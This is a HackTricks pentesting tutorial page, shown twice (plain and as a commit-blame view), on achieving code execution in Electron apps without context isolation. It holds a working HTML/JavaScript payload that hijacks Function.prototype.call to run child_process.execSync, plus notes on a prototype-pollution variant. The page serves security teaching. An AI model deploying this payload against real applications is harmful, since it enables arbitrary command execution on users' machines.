hacktricks/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop.../electron-contextisolation-r...

# Electron contextIsolation RCE via Electron internal code

<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>

## Example 1

Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41)

"exit" event listener is always set by the internal code when de page loading is started. This event is emitted just before navigation:

```javascript
process.on('exit', function (){
    for (let p in cachedArchives) {
        if (!hasProp.call(cachedArchives, p)) continue
        cachedArchives[p].destroy()
    }
})
```

{% embed url="https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36" %}

![](<../../../.gitbook/assets/image (664).png>)

https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- No longer exists

Then it goes here:

![](<../../../.gitbook/assets/image (647).png>)

Where "self" is Node's process object:

![](<../../../.gitbook/assets/image (652) (1).png>)

The process object has a references to "require" function:

```
process.mainModule.require
```

As the handler.call is going to receive the process object we can overwrite it to execute arbitrary code:

```html
<script>
Function.prototype.call = function(process){
    process.mainModule.require('child_process').execSync('calc');
}
location.reload();//Trigger the "exit" event
</script>
```

## Example 2

Get **require object from prototype pollution**. From [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)

Leak:

<figure><img src="../../../.gitbook/assets/image (34).png" alt=""><figcaption></figcaption></figure>

Exploit:

<figure><img src="../../../.gitbook/assets/image (35).png" alt=""><figcaption></figcaption></figure>

<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>
GitBook: [#3293] No subject 2022-06-28 19:21:21 +02:00			`# Electron contextIsolation RCE via Electron internal code`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
			`<details>`

			`<summary><strong>Support HackTricks and get benefits!</strong></summary>`

GitBook: [#3669] No subject 2022-12-03 19:45:54 +01:00			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
			`* Share your hacking tricks by submitting PRs to the [hacktricks github repo](https://github.com/carlospolop/hacktricks).`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
			`</details>`

GitBook: [#3293] No subject 2022-06-28 19:21:21 +02:00			`## Example 1`
GitBook: [#3110] No subject 2022-04-20 14:35:33 +02:00
			`Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41)`

			`"exit" event listener is always set by the internal code when de page loading is started. This event is emitted just before navigation:`

			```javascript
			`process.on('exit', function (){`
			`for (let p in cachedArchives) {`
			`if (!hasProp.call(cachedArchives, p)) continue`
			`cachedArchives[p].destroy()`
			`}`
			`})`
			```

			`{% embed url="https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36" %}`

			`![](<../../../.gitbook/assets/image (664).png>)`

			`https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- No longer exists`

			`Then it goes here:`

			`![](<../../../.gitbook/assets/image (647).png>)`

			`Where "self" is Node's process object:`

GitBook: [#3293] No subject 2022-06-28 19:21:21 +02:00			`![](<../../../.gitbook/assets/image (652) (1).png>)`
GitBook: [#3110] No subject 2022-04-20 14:35:33 +02:00
			`The process object has a references to "require" function:`

			```
			`process.mainModule.require`
			```

			`As the handler.call is going to receive the process object we can overwrite it to execute arbitrary code:`

			```html
			`<script>`
			`Function.prototype.call = function(process){`
			`process.mainModule.require('child_process').execSync('calc');`
			`}`
			`location.reload();//Trigger the "exit" event`
			`</script>`
			```
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
GitBook: [#3669] No subject 2022-12-03 19:45:54 +01:00			`## Example 2`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
GitBook: [#3669] No subject 2022-12-03 19:45:54 +01:00			`Get require object from prototype pollution. From [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)`

			`Leak:`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
GitBook: [#3669] No subject 2022-12-03 19:45:54 +01:00			`<figure><img src="../../../.gitbook/assets/image (34).png" alt=""><figcaption></figcaption></figure>`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
GitBook: [#3669] No subject 2022-12-03 19:45:54 +01:00			`Exploit:`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
GitBook: [#3669] No subject 2022-12-03 19:45:54 +01:00			`<figure><img src="../../../.gitbook/assets/image (35).png" alt=""><figcaption></figcaption></figure>`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
GitBook: [#3669] No subject 2022-12-03 19:45:54 +01:00			`<details>`

			`<summary><strong>Support HackTricks and get benefits!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
GitBook: [#3669] No subject 2022-12-03 19:45:54 +01:00			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
			`* Share your hacking tricks by submitting PRs to the [hacktricks github repo](https://github.com/carlospolop/hacktricks).`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00
			`</details>`